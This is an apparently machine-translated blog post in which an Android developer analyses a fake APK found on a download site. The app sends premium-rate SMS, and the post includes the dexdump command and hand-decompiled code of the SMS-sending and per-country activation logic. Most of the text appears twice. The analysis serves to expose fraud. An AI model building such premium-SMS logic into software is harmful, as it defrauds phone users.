Fraudulent Android applications. Poking the enemy
I’m a developer of an Android application and I’m following up on new links to it with Google subscriptions. This morning, I was happy to find a letter in the box, in which there was a new link to my application. All perfectly! And the review is positive, and the number of downloads is different from 0; only the version is for some reason old and ... the size of the APK is 3 megabytes against the original ~ 200K
After downloading and unpacking the APK (remember that the APK is just a ZIP archive), it showed “stuffing” of 153 PNG files (renamed for some reason to .temp) with a witness from Fryazino and the “application” itself ...
As expected, there is nothing left of the original application. No icons, no more code. And upon further consideration (it seems that) ALL files on androides-os.com are one and the same program! I downloaded several different programs from different sections and they were all the same size and with the same content!
')
Inside there was something that, by a quick analysis of resources, turned out to be an application requesting activation by sending an SMS. Let's try to figure out where and what is sent ...
We cannot get pure Java code from the APK, but you can get a set of instructions from VM Dalvik, which is quite readable by the eyes without additional software. Using the dexdump utility from the Android SDK, we will dump a set of Dalvik instructions into a file ...
Since it is assumed that the application is sending SMS, we will look for the string " sendTextMessage " in the dump - this is the SDK function for sending text messages. The search is successful, there is one entry in the activate () method
In brief, the main details of the method (obtained by manual “decompiling” dalvik instructions):
Those. There is a certain set of "activation schemes" consisting of a list of pairs of lines, one of which is the number to which the SMS should be sent, and the other is what to actually send.
Let's try to find activation schemes ... in the dump there is a method initActivationSchemes where you can find the following code:
Those. for Russia ( MCC == 250 ), an activation scheme is created from sending two SMS to number 4129 ... The method along with the MCC 250 also has other country codes, and, accordingly, an activation scheme for them. For each country picked up a certain paid number.
There is some neponyatka. Despite the fact that 250 is Russia, number 4129 (at least according to the information I was able to find) breaks through as Ukrainian. Maybe I made a mistake when “decompiling” and accidentally “wrote down” codes for Ukraine in the Russian block ...
Actually, what the application looks like ...
Install is it:
At startup, everything is very straightforward:
There is even an "offer":
The same “offer” seems to be available here: http://depositfmobi.ru/ofert
I went to the site by the name of the package application: com.depositmobi.
What is interesting is the depositmobi and "QIP. Files" and "Rapidshare" at the same time!
What is the result? A very simple way of fraud. We make a website, pump SEO for it using the necessary keywords, pump up thematic news there and fill it with the simplest program for sending SMS to premium numbers by supplying it with an “offer” to cover your ass ... Can you do something with such comrades in legal ways?
After downloading and unpacking the APK (remember that the APK is just a ZIP archive), it showed “stuffing” of 153 PNG files (renamed for some reason to .temp) with a witness from Fryazino and the “application” itself ...
As expected, there is nothing left of the original application. No icons, no more code. And upon further consideration (it seems that) ALL files on androides-os.com are one and the same program! I downloaded several different programs from different sections and they were all the same size and with the same content!
')
Inside there was something that, by a quick analysis of resources, turned out to be an application requesting activation by sending an SMS. Let's try to figure out where and what is sent ...
We cannot get pure Java code from the APK, but you can get a set of instructions from VM Dalvik, which is quite readable by the eyes without additional software. Using the dexdump utility from the Android SDK, we will dump a set of Dalvik instructions into a file ...
dexdump -d -f -h classes.dex > dump.dump Since it is assumed that the application is sending SMS, we will look for the string " sendTextMessage " in the dump - this is the SDK function for sending text messages. The search is successful, there is one entry in the activate () method
In brief, the main details of the method (obtained by manual “decompiling” dalvik instructions):
// private HashMap<String, ActivationScheme> activationSchemes; // private static String CURRENT_ACTIVATION_SCHEME = "1"; ActivationScheme o = activationSchemes.get(CURRENT_ACTIVATION_SCHEME); ArrayList<Pair<String, String>> l = o.list; // first - // second - ? for(Pair o2: l) { StringBuilder b; String sec = String.valueOf(o2.second); // WTF??? b = new StringBuilder(sec); b.append("+"); String s3 = schemes.get("2"); // private HashMap<String, String> schemes; b.append(s3); String result = b.toString(); // "pair.second"+schemes[2] String frst = o2.first; // v1 // mgr == TelephonyManager mgr.sendTextMessage(frst, null, result, /* PendingIntent.getBroadcast(...) */, null); } Those. There is a certain set of "activation schemes" consisting of a list of pairs of lines, one of which is the number to which the SMS should be sent, and the other is what to actually send.
Let's try to find activation schemes ... in the dump there is a method initActivationSchemes where you can find the following code:
ArrayList al = new ArrayList(); if("250".equals(currentMCC)) { // MCC == Mobile Country Code ArrayList<Pair<String, String>> aP = new ArrayList<Pair<String, String>>(); Pair<String, String> p = new Pair<String, String>("4129", "bb031"); aP.add(p); p = new Pair<String, String>("4129", "bb031"); aP.add(p); ActivationScheme sc = new ActivationScheme(aP); activationScheme.put(CURRENT_ACTIVATION_SCHEME, sc); } Those. for Russia ( MCC == 250 ), an activation scheme is created from sending two SMS to number 4129 ... The method along with the MCC 250 also has other country codes, and, accordingly, an activation scheme for them. For each country picked up a certain paid number.
There is some neponyatka. Despite the fact that 250 is Russia, number 4129 (at least according to the information I was able to find) breaks through as Ukrainian. Maybe I made a mistake when “decompiling” and accidentally “wrote down” codes for Ukraine in the Russian block ...
Actually, what the application looks like ...
Install is it:
At startup, everything is very straightforward:
There is even an "offer":
The same “offer” seems to be available here: http://depositfmobi.ru/ofert
I went to the site by the name of the package application: com.depositmobi.
What is interesting is the depositmobi and "QIP. Files" and "Rapidshare" at the same time!
What is the result? A very simple way of fraud. We make a website, pump SEO for it using the necessary keywords, pump up thematic news there and fill it with the simplest program for sending SMS to premium numbers by supplying it with an “offer” to cover your ass ... Can you do something with such comrades in legal ways?
Source: https://habr.com/ru/post/129138/
All Articles